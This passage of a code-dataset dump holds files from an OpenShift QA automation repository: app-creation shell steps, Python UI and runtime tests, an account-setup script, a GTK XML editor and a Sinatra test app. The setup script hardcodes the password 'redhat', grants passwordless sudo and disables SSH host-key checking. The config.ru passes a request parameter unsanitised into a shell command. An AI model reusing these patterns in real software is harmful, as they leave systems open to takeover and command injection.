${scalable_nodejs_app} \"nodejs-0.6\" ${rhlogin} ${password} '--scaling'\n#fi\n\necho '---------------------------------' | tee -a ${log_file}\nif [ X\"$choice\" == X\"0\" ] || [ X\"$choice\" == X\"scalable_jbossews_app\" ]; then\n create_app ${scalable_jbossews_app} \"jbossews\" ${rhlogin} ${password} '--scaling' \"-g medium\" &&\n add_cart ${scalable_jbossews_app} \"postgresql\" \"${rhlogin}\" \"${password}\" &&\n run_command \"cd ${scalable_jbossews_app} && git remote add upstream -m master git://github.com/openshift/tomcat6-example.git && git pull -s recursive -X theirs upstream master && git push && cd -\"\nfi\n\n\necho '---------------------------------' | tee -a ${log_file}\n# Save user info into file\necho \"Saving user info for ${namespace}\"\nrhc domain show -l ${rhlogin} -p ${password} | tee ${user_info_file}.${namespace}\n\n" }, { "alpha_fraction": 0.5985348224639893, "alphanum_fraction": 0.6234432458877563, "avg_line_length": 21.733333587646484, "blob_id": "3517dfeea035775c3c39009eb44f882bf6534b80", "content_id": "505c92d9c787063879a05b2d820d3740e96fa5f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1365, "license_type": "no_license", "max_line_length": 105, "num_lines": 60, "path": "/automation/open/testmodules/UI/web/case_122419.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122419.py\n# Date: 2012/07/24 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Create_existing_domain(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Create domain with existing domain\n web.assert_text_equal_by_xpath('''MANAGEMENT CONSOLE''',\n '''//div/span''')\n web.go_to_domain_edit()\n web.input_by_id('domain_name','yujzhang')\n web.click_element_by_id('domain_submit')\n time.sleep(5)\n web.assert_text_equal_by_xpath('''Namespace 'yujzhang' already in use. Please choose another.''',\n '''//form[@id='edit_domain_yujzhang']/ul/li''') \n\n self.tearDown()\n\n return self.passed(\"Case 122419 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Create_existing_domain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122419.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7031700015068054, "alphanum_fraction": 0.7175792455673218, "avg_line_length": 22.931034088134766, "blob_id": "f20ade57002be10c0615add14e22f13986e59094", "content_id": "845e051fece80767e0a0fb63d0e62bdcda64c99c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 694, "license_type": "no_license", "max_line_length": 106, "num_lines": 29, "path": "/automation/open/testmodules/RT/hot_deploy/nodejs_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 13, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom nodejs_without_jenkins import NodeJSHotDeployWithoutJenkins\n\nclass NodeJSHotDeployWithJenkins(NodeJSHotDeployWithoutJenkins):\n\n def __init__(self, config):\n NodeJSHotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2747][RT]Hot deployment support for application - with Jenkins - nodejs\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodeJSHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6038960814476013, "alphanum_fraction": 0.6127508878707886, "avg_line_length": 25.46875, "blob_id": "b47e8dafb7db04912671a6dfcafbe8f1a73c4dfd", "content_id": "5065c8c56de9dcded87e0233ec0b365146685d9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1694, "license_type": "no_license", "max_line_length": 88, "num_lines": 64, "path": "/automation/open/testmodules/RT/limits/quota.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nAug 2, 2012\n\"\"\"\nimport rhtest\nimport common\nimport re\nimport OSConf\n\nclass QuotaTest(rhtest.Test):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n\n def log_info(self, message):\n self.info('=' * 80)\n self.info(message)\n self.info('=' * 80)\n\n def initialize(self):\n self.application_name = common.getRandomString()\n self.application_type = common.app_types['php']\n self.summary = '[US1851][Runtime][rhc-node] View Quota info'\n\n def finalize(self):\n pass\n \n def test_method(self):\n self.log_info('Creating an application')\n common.create_app(\n self.application_name,\n self.application_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n clone_repo = False\n )\n\n self.log_info(\"Running command 'quota'\")\n ( ret_code, ret_output ) = common.run_remote_cmd(self.application_name, 'quota')\n self.info('Asserting that the return code of the command is 0...')\n self.assert_equal(ret_code, 0)\n self.info('Verifyting the correct output...')\n uuid = OSConf.get_app_uuid(self.application_name)\n match = re.match('Disk quotas for user %s' % uuid, ret_output)\n self.assert_true(match != None)\n\n # Everything is OK\n self.passed(self.summary)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuotaTest)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.4961051642894745, "alphanum_fraction": 0.5111976861953735, "avg_line_length": 27.720279693603516, "blob_id": "40b506a95365a2149da1e3539dee14770f85007e", "content_id": "f1c547e3047e01b682029469bab228ccfb8cb551", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4108, "license_type": "no_license", "max_line_length": 94, "num_lines": 143, "path": "/automation/open/bin/setup_unix_account.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# [email protected] 2012\n#\n#\n# This script helps to have multiple accounts which can run only ONE job per time \n# - because of conflicts with .openshift/express.conf\n# Just run it locally with new_username and remote_host as arguments.\n\n####################################################################################3\n####################################################################################3\n####################################################################################3\n#1. scp this job to remote station\n####################################################################################3\n####################################################################################3\n####################################################################################3\n\n\nif [ -z \"$2\" ]; then\n echo \"Usage: $0 <USER> <REMOTE_HOST>\"\n exit 2\nfi\n\nSSH_KEY=jenkins.pub\nif [ ! -f ~/.ssh/$SSH_KEY ]; then\n echo \"Missing SSH key ~/.ssh/$SSH_KEY for accessing this node...\"\n exit 3\nfi\n\nHOST=$2\n: ${HOST:=localhost}\nSCRIPT_NAME=setup_testing_account.sh\nSCRIPT=/tmp/$SCRIPT_NAME\ncat <<JOB >$SCRIPT\necho \"Creating a OpenShift QA testing user $1 ...\"\n\n#set -e\n\nif [ \"\\$UID\" != \"0\" ]; then\n echo \"You must be ROOT to run this script\"\n exit 2\nfi\n\nadduser $1 || exit\necho \"setup 'redhat' password...\"\nmkdir -p /home/$1\nchown $1:$1 /home/$1\nexpect <<PASSWD\nspawn passwd $1\nexpect {\n password: {send \"redhat\\r\" ; exp_continue}\n eof exit\n}\nPASSWD\n\ncat <<'EOF' >/home/$1/run_as_user.sh\n#!/bin/sh\n\ncd /home/$1\n\nmkdir -p /home/$1/.ssh\nmkdir -p /home/$1/.openshift || exit\nexport RHTEST_HOME=/home/$1/openshift/\necho \"Setting RHTEST_HOME to \\$RHTEST_HOME\"\ncp /tmp/.awscred /home/$1/.awscred\n#\n#OpenShift\n#\ncat <<'EOF0' >/home/$1/.openshift/express.conf\nlibra_server=int.openshift.redhat.com\n# Default rhlogin to use if none is specified\[email protected]\nEOF0\n\ncat <<'EOF1' >/home/$1/.openshiftrc\nexport RHTEST_HOME=/home/$1/openshift/\nexport PYTHONPATH=\\${RHTEST_HOME}/lib/supports:\\${RHTEST_HOME}/lib:\\${RHTEST_HOME}/testmodules\nexport PATH=\\${RHTEST_HOME}/bin:\\$PATH\nexport OPENSHIFT_libra_server='int.openshift.redhat.com'\nexport [email protected]\nexport OPENSHIFT_user_passwd=redhat\nEOF1\n\necho \"SSH setup...\"\ncat <<EOF2 >/home/$1/.ssh/config\n\nHost *.rhcloud.com\n IdentityFile ~/.ssh/id_rsa\n VerifyHostKeyDNS yes\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/openshift_known_hosts\n\nEOF2\n\ncat /tmp/$SSH_KEY >>/home/$1/.ssh/authorized_keys\nchmod 600 /home/$1/.ssh/config\n\necho \"GIT setup...\"\ngit config --global user.name \"jenkins+$1\"\ngit config --global user.email \"[email protected]\"\n\n#echo \"CRON setup...\"\n#echo \"* * * * * /usr/local/bin/whatever.sh\" | crontab -\n\necho \"RHTEST setup...\"\nURL=\"git://qe-git.englab.nay.redhat.com/hss-qe/openshift/openshift-express/automation\"\nmkdir -p \\$RHTEST_HOME\ngit clone \\$URL \\$RHTEST_HOME\nEOF\n\ncp ~/.ssh/$SSH_KEY /tmp\nchmod +x /home/$1/run_as_user.sh\necho \"Run as the '$1' user...\"\npushd /home/$1\nsudo -u $1 /home/$1/run_as_user.sh\nrm -f /home/$1/run_as_user.sh\npopd\n\n[ -f /home/$1/.ssh/authorized_keys ] || echo \"Warning: Missing authorized_keys file\"\n\necho \"Add wheel group to sudoers\"\nsed -i -e 's/#.*%wheel.*$/%wheel ALL=(ALL) NOPASSWD: ALL/' /etc/sudoers\necho \"Add user to wheel group\"\nusermod -aG wheel $1\n\nJOB\necho \"Copying the ssh key\"\nscp ~/.ssh/$SSH_KEY root@$HOST:\necho \"Copying the script...\"\nscp $SCRIPT root@$HOST:$SCRIPT\n\n####################################################################################3\n####################################################################################3\n####################################################################################3\n#2. Run this script\n####################################################################################3\n####################################################################################3\n####################################################################################3\n\necho \"Run 'chmod +x ...'\"\nssh root@$HOST chmod +x $SCRIPT\necho \"Run the script...\"\nssh -t root@$HOST $SCRIPT\n\n" }, { "alpha_fraction": 0.4980921745300293, "alphanum_fraction": 0.5031797289848328, "avg_line_length": 36.167274475097656, "blob_id": "24749c7f178e4b21c1d84b471a9debc9006a7fdb", "content_id": "d0cba700f88e5f71aab549b0315b24ef001cf0f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10221, "license_type": "no_license", "max_line_length": 144, "num_lines": 275, "path": "/automation/open/testmodules/RT/scaling/scaling_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\nfrom common import consts\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\nimport re\n# user defined packages\nimport openshift\nimport fileinput\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.config.test_variant\n except:\n self.test_variant = 'python'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n self.git_repo = './' + self.app_name\n common.env_setup()\n self.steps_list = []\n self.domain_name = common.get_domain_name()\n \n def finalize(self):\n pass\n\nclass ScalingSupport(OpenShiftTest):\n def configure_scale_up_test_application(self):\n if self.test_variant == \"php\":\n #\n # PHP\n #\n new_file = open(self.git_repo + \"/php/gear.php\", \"w\")\n new_file.write(\"<?php\\n\")\n new_file.write(\"header(\\\"Content-Type: text/plain\\\");\\n\")\n new_file.write(\"echo $_ENV[\\\"OPENSHIFT_GEAR_DNS\\\"];\\n\")\n new_file.write(\"?>\")\n new_file.close()\n elif self.test_variant == \"nodejs\":\n #\n # NODEJS\n # Only gear usage testing so far\n #\n try:\n for line in fileinput.input(self.git_repo + \"/server.js\", inplace = 1):\n if re.search(\"Routes for /health\", line):\n print \" self.routes['/gear.js'] = function(req, res) {\"\n print \" res.send(process.env.OPENSHIFT_GEAR_DNS, {'Content-Type': 'text/plain'});\"\n print \" };\"\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n #\n # Rack\n # Only gear usage testing so far\n #\n try:\n for line in fileinput.input(self.git_repo + \"/config.ru\", inplace = 1):\n if re.search(\"map '/health' do\", line):\n print \"map '/gear.rb' do\"\n print \" gear_dns = proc do |env|\"\n print \" [ 200, { 'Content-Type' => 'text/plain'}, ENV['OPENSHIFT_GEAR_DNS'] ]\"\n print \" end\"\n print \" run gear_dns\"\n print \"end\"\n print\n print line\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n #\n # JBOSS\n #\n gear_file = open(self.git_repo + \"/src/main/webapp/gear.jsp\", \"w\")\n gear_file.write(\"<%@ page contentType=\\\"text/plain\\\" language=\\\"java\\\" import=\\\"java.sql.*\\\" %>\\n\")\n gear_file.write(\"<%@ page import=\\\"javax.naming.*\\\" %>\\n\")\n gear_file.write(\"<%@ page import=\\\"java.util.*\\\" %>\\n\")\n gear_file.write(\"<%@ page trimDirectiveWhitespaces=\\\"true\\\" %>\\n\")\n gear_file.write(\"<%\\n\")\n gear_file.write(\"Map map = System.getenv();\\n\")\n gear_file.write(\"out.print(map.get(\\\"OPENSHIFT_GEAR_DNS\\\"));\\n\")\n gear_file.write(\"%>\\n\")\n gear_file.close()\n elif self.test_variant == \"perl\":\n #\n # Perl\n #\n gear_file = open(self.git_repo + \"/perl/gear.pl\", \"w\")\n gear_file.write(\"#!/usr/bin/perl\\n\")\n gear_file.write(\"print 'Content-type: text/plain\\r\\n\\r\\n';\")\n gear_file.write(\"print $ENV{'OPENSHIFT_GEAR_DNS'};\")\n gear_file.close()\n elif self.test_variant in (\"python\", \"wsgi\",\"python-2.7\",\"python-3.3\"):\n #\n # Python\n #\n try:\n print \"H %s\" % (self.git_repo + \"/wsgi/application\")\n for line in fileinput.input(self.git_repo + \"/wsgi/application\", inplace = 1):\n if re.search(\"PATH_INFO.+/env\", line):\n print \" elif environ['PATH_INFO'] == '/gear.py':\"\n print \" response_body = os.environ['OPENSHIFT_GEAR_DNS']\"\n #print \"\\telif environ['PATH_INFO'] == '/gear.py':\"\n #print \"\\t\\tresponse_body = os.environ['OPENSHIFT_GEAR_DNS']\"\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n\n configuration_steps = [\n \"cd %s\" % ( self.git_repo ),\n \"git add .\",\n \"git commit -a -m testing_gears_and_sessions\",\n \"git push\"\n ]\n\n return common.command_get_status(\" && \".join(configuration_steps))\n\n def number_of_gears(self):\n time.sleep(30)\n app_url = OSConf.get_app_url(self.app_name)\n gears = list()\n suffix = {\n \"php\" : \".php\",\n \"nodejs\" : '.js',\n \"ruby\" : \".rb\",\n \"ruby-1.9\" : \".rb\",\n \"rack\" : \".rb\",\n \"jbossas\" : \".jsp\",\n \"jbosseap\" : \".jsp\",\n \"perl\" : \".pl\",\n \"python\" : \".py\",\n \"wsgi\" : \".py\",\n \"python-3.3\" : \".py\",\n \"python-2.7\" : \".py\",\n }\n\n # Checking the output of gear dns script more times\n\t#print \">>>\"*30\n\t#print \"app_url : %s\"%app_url\n\t#print \"<<<\"*30\n for i in range(1, 11):\n gear = common.fetch_page(app_url + \"/gear\" + suffix[self.test_variant])\n #let's check the format\n re_str=\".com\"\n #if self.config.options.run_mode == 'OnPremise':\n # #re_str=\"example.com\"\n # re_str=\"osetestv2.com\"\n #else:\n # re_str=\"rhcloud.com\"\n #print \"**>>\"*30\n #print \"gear : %s\"%gear\n #print \"**<<\"*30\n\n if re.search(r\".*%s$\"%(re_str), gear):\n if gear not in gears:\n self.info(\"GEAR: [%s]\"%gear)\n gears.append(gear)\n\n\t#print \">>**\"*30\n\t#print \"gears : %s\"%gears\n\t#print \"<<**\"*30\n return len(gears)\n\n\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Creating a scalable application\",\n common.create_app,\n function_parameters = [ self.app_name, self.app_type, self.user_email, self.user_passwd, True, self.git_repo, True ],\n expect_description = \"The application must be created successfully\",\n expect_return = 0\n ))\n self.steps_list.append(testcase.TestCaseStep(\n \"Scaling up via REST API\",\n common.scale_up,\n function_parameters = [ self.app_name, self.domain_name ],\n expect_description = \"The application must scale-up successfully\",\n expect_return = 0\n ))\n\n for operation in [ \"stop\", \"restart\", \"reload\", \"force-stop\", \"start\" ]:\n self.steps_list.append(testcase.TestCaseStep(\n \"Checking operation '%s'\" % operation,\n \"rhc app %s %s -l %s -p '%s' %s\" % ( operation, self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = \"Operation must be successfull\",\n expect_return = 0\n ))\n\n # Checking web-page availability with refreshing\n for i in range(1,6):\n self.steps_list.append(testcase.TestCaseStep(\n \"Checking web-page #%d\" % ( i ),\n common.check_web_page_output,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must be available in the browser\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Configuring the test application\",\n self.configure_scale_up_test_application,\n expect_description = \"The application must be configured successfully\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Checking the number of gears\",\n self.number_of_gears,\n expect_description = \"The number of gears must be '2'\",\n expect_return = 2\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Scaling down via REST API\",\n common.scale_down,\n function_parameters = [ self.app_name, self.domain_name],\n expect_description = \"The application must scale-down successfully\",\n expect_return =0 \n ))\n \n self.steps_list.append(testcase.TestCaseStep(\n \"Checking web-page availability\",\n common.check_web_page_output,\n function_parameters = [ self.app_name ],\n expect_description = \"The application must be available in the browser\",\n expect_return = 0\n ))\n\n case= testcase.TestCase(\"Scaling support\", self.steps_list)\n case.run()\n \n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ScalingSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6402266025543213, "alphanum_fraction": 0.6480169892311096, "avg_line_length": 25.129629135131836, "blob_id": "b96f4a7f1e13632a1fa463152e4b96e92c81ccf1", "content_id": "9e878fabc0725c4de4248672293064644303490b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "no_license", "max_line_length": 128, "num_lines": 54, "path": "/automation/open/testmodules/RT/security/selinux_pre_check_devenv.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 23, 2011\n\n\"\"\"\n\nimport os, sys\n\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n def initialize(self):\n self.summary=\"[integration][rhc-selinux]SELinux separation - devenv pre check\"\n self.info(self.summary)\n common.env_setup()\n\nclass SELinuxPreCheck(OpenShiftTest):\n def test_method(self):\n self.info(\"check_selinux_status\")\n (ret, output) = common.run_remote_cmd_as_root(\"sestatus\")\n self.assert_match(['SELinux status:.*enabled', 'Current mode:.*enforcing', 'Mode from config file:.*enforcing'], output)\n self.assert_equal(ret, 0)\n\n self.info(\"Get semodule list\")\n (ret, output) = common.run_remote_cmd_as_root(\"semodule -l|grep libra\")\n self.assert_match('libra', output)\n self.assert_equal(ret, 0)\n\n self.info(\"Check audit service\")\n (ret, output) = common.run_remote_cmd_as_root(\"service auditd status\")\n self.assert_equal(ret, 0)\n self.assert_match(['auditd .* is running...'], output)\n\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SELinuxPreCheck)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6784810423851013, "alphanum_fraction": 0.6845569610595703, "avg_line_length": 24.477418899536133, "blob_id": "322c280c2af97d530393fee2085a06194ddc9f1c", "content_id": "0e18eb70a97488e01269dbcde5b1ce08fe05983e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3950, "license_type": "no_license", "max_line_length": 93, "num_lines": 155, "path": "/automation/open/lib/supports/XML/xmleditor.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nThe xmleditor module defines a GUI tool to edit an XML tree. Changes are\nautomatically saved. \n\nxmledit = XMLEditor(xmlfile)\nmainloop()\n\n\"\"\"\n\n# modified from the pygtk ide/browse module.\n\nimport os\nfrom gtk import *\n\nimport xmltools\n\nclass BrowseTreeItem(GtkTreeItem):\n\tdef __init__(self, name, dict=None, disp=None):\n\t\tGtkTreeItem.__init__(self, name)\n\t\tself.name = name\n\t\tself.dict = dict\n\t\tself.disp = disp\n\t\tself.exp_id = self.connect(\"expand\", self.sig_expand)\n\tdef init_subtree(self):\n\t\tif type(self.dict) is type(self.__dict__):\n\t\t\tself.subtree = GtkTree()\n\t\t\tself.subtree.set_selection_mode(SELECTION_BROWSE)\n\t\t\tself.subtree.connect(\"select_child\", self.subsel_child)\n\t\t\tself.set_subtree(self.subtree)\n\t\t\tself.subtree.show()\n\tdef subsel_child(self, _t, _c):\n\t\tif self.disp: \n\t\t\tkey = _c.children()[0].get()\n\t\t\tvalue = self.dict[key]\n\t\t\tif type(value) is not type(self.__dict__):\n\t\t\t\tprint xmltools.node2path(value)\n\t\t\t\tif value.childNodes: # has a value \n\t\t\t\t\tself.disp.set_text(str(value.childNodes[0].nodeValue))\n\t\t\t\telse:\n\t\t\t\t\tself.disp.set_text(\"\")\n\t\t\t\t# stash the node in the Entry in case it is edited\n\t\t\t\tself.disp.set_data(\"node\", value)\n\t\t\telse:\n\t\t\t\tself.disp.set_text(\"\")\n\t\t\t\tself.disp.set_data(\"node\", None)\n\tdef sig_expand(self, _t):\n\t\tkeys = self.dict.keys()\n\t\tkeys.sort()\n\t\tfor key in keys:\n\t\t\tdict = None\n\t\t\ttry:\n\t\t\t\tdict = self.dict[key]\n\t\t\texcept TypeError:\n\t\t\t\tpass\n\t\t\titem = BrowseTreeItem(key, dict, self.disp)\n\t\t\tself.subtree.append(item)\n\t\t\titem.init_subtree()\n\t\t\titem.show()\n\t\tself.disconnect(self.exp_id)\n\nclass BrowseVariables(GtkVBox):\n\tdef sig_entry_activate(self, disp): # change value\n\t\tnode = disp.get_data(\"node\")\n\t\tif node:\n\t\t\tif node.childNodes: \n\t\t\t\ttextnode = node.childNodes[0] # minidom has a strange API...\n\t\t\t\ttextnode.deleteData(0, textnode.length)\n\t\t\t\ttextnode.appendData(disp.get_text())\n\t\t\telse: # no existing value node, so add one\n\t\t\t\tnode.appendChild(xmltools.minidom.Text(disp.get_text()))\n\t\t\tself.dom.set_dirty()\n\tdef __init__(self, dom):\n\t\tGtkVBox.__init__(self)\n\t\tself.set_spacing(2)\n\t\tself.dom = dom\n\n\t\tself.sw = GtkScrolledWindow()\n\t\tself.sw.set_usize(300, 200)\n\t\tself.sw.set_policy(POLICY_AUTOMATIC, POLICY_AUTOMATIC)\n\t\tself.pack_start(self.sw)\n\t\tself.sw.show()\n\n\t\tself.disp = GtkEntry()\n\t\tself.disp.set_editable(TRUE)\n\t\tself.disp.connect(\"activate\", self.sig_entry_activate)\n\t\tself.pack_start(self.disp, expand=FALSE)\n\t\tself.disp.show()\n\n\t\tself.root_tree = GtkTree()\n\t\tself.sw.add_with_viewport(self.root_tree)\n\t\tself.root_tree.show()\n\n\t\tself.browse = BrowseTreeItem(os.path.basename(dom.filename), dom.get_xml_dict(), self.disp)\n\t\tself.root_tree.append(self.browse)\n\t\tself.browse.init_subtree()\n\t\tself.browse.show()\n\n\nclass BrowseWindow(GtkWindow):\n\tdef __init__(self, dom):\n\t\tGtkWindow.__init__(self)\n\t\tself.set_title(\"Browse Window\")\n\n\t\tbox = GtkVBox()\n\t\tself.add(box)\n\t\tbox.show()\n\n\t\tbrowse = BrowseVariables(dom)\n\t\tbrowse.set_border_width(10)\n\t\tbox.pack_start(browse)\n\t\tbrowse.show()\n\t\t\n\t\tseparator = GtkHSeparator()\n\t\tbox.pack_start(separator, expand=FALSE)\n\t\tseparator.show()\n\n\t\tbox2 = GtkVBox(spacing=10)\n\t\tbox2.set_border_width(10)\n\t\tbox.pack_start(box2, expand=FALSE)\n\t\tbox2.show()\n\n\t\tbutton = GtkButton(\"Close/Save\")\n\t\tbox2.pack_start(button)\n\t\tbutton.set_flags(CAN_DEFAULT)\n\t\tbutton.grab_default()\n\t\tbutton.show()\n\t\tself.close_button = button\n\n\nclass XMLEditor(object):\n\tdef _cleanup(self, button):\n\t\tif self.doc.dirty:\n\t\t\tself.doc.write()\n\t\tmainquit()\n\tdef __init__(self, xmlfile):\n\t\tself.doc = xmltools.XMLDocument(xmlfile)\n\t\tself.win = BrowseWindow(self.doc)\n\t\tself.win.set_title(os.path.basename(xmlfile).title())\n\t\tself.win.connect(\"destroy\", mainquit)\n\t\tself.win.connect(\"delete_event\", mainquit)\n\t\tself.win.close_button.connect(\"clicked\", self._cleanup)\n\t\tself.win.show()\n\t\n\tdef run(self):\n\t\tmainloop()\n\ndef run_editor(filename):\n\txmledit = XMLEditor(filename)\n\txmledit.run()\n\n\nif __name__ == '__main__':\n\timport sys\n\trun_editor(sys.argv[1])\n\n" }, { "alpha_fraction": 0.5348460078239441, "alphanum_fraction": 0.5380875468254089, "avg_line_length": 22.283018112182617, "blob_id": "dfec2a25549a7a05f2bcc35f7a48343ac8668dcc", "content_id": "6426495e23ea723ec5aa067c0e68573bd7cb6876", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1234, "license_type": "no_license", "max_line_length": 93, "num_lines": 53, "path": "/automation/open/testmodules/RT/cartridge/app_template/bigdata/datadir/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# contents of 'config.ru'\nrequire 'rubygems'\nrequire 'bundler'\n\nBundler.require\n\nmap '/' do\n \"[rhc-cartridge]snapshot/restore big data to new app\"\nend\n\nmap '/create' do\n begin\n size = request.params().fetch(\"size\", \"300\")\n cmd = \"dd if=/dev/urandom of=#{ENV['OPENSHIFT_DATA_DIR']}bigfile bs=1M count=#{size}\"\n ret = system(cmd)\n if ret == true\n msg = \"The bigfile has been created.\"\n else\n msg = \"Failed to create bigfile under OPENSHIFT_DATA_DIR\"\n end\n end\n \"Command: #{cmd}<br />#{msg}\"\nend\n\nmap '/delete' do\n begin\n cmd = \"rm -f #{ENV['OPENSHIFT_DATA_DIR']}bigfile\"\n ret = system(cmd)\n if ret == true\n msg = \"The bigfile has been deleted.\"\n else\n msg = \"Failed to delete the bigfile\"\n end\n end\n \"Command: #{cmd}<br />#{msg}\"\nend\n\nmap '/show' do\n begin\n cmd = \"ls -lh #{ENV['OPENSHIFT_DATA_DIR']}bigfile\"\n ret = system(cmd)\n output = `#{cmd}`\n if ret == true\n msg = \"The bigfile exists.\"\n else\n msg = \"The bigfile doesnot exist.\"\n end\n end\n \"Command: #{cmd}<br />#{output}<br />#{msg}\"\nend\n\n\nrun Sinatra::Application\n" }, { "alpha_fraction": 0.6682808995246887, "alphanum_fraction": 0.694915235042572, "avg_line_length": 21.509090423583984, "blob_id": "3f7a3dd6540e77356a97148fe6e4b69c6ddd5f34", "content_id": "0c5e302dad142be344c2244d163a45591ad47e48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1239, "license_type": "no_license", "max_line_length": 139, "num_lines": 55, "path": "/automation/open/testmodules/UI/web/case_174984.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174984.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass LoginWithOpenshiftUserAndPasswordOfRHNAccount(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login_new(web.username_both_registered_openshift_account,web.password_both_registered_RHN_account)\n\n web.assert_text_equal_by_xpath(\"The supplied login or password was invalid.\",\"//div[@id='content']/div/div/div/div/div/form/ul/li\")\n\n\n\n self.tearDown()\n\n return self.passed(\" case_174984--LoginWithOpenshiftUserAndPasswordOfRHNAccount passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LoginWithOpenshiftUserAndPasswordOfRHNAccount)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174984.py\n#\n# vim: set 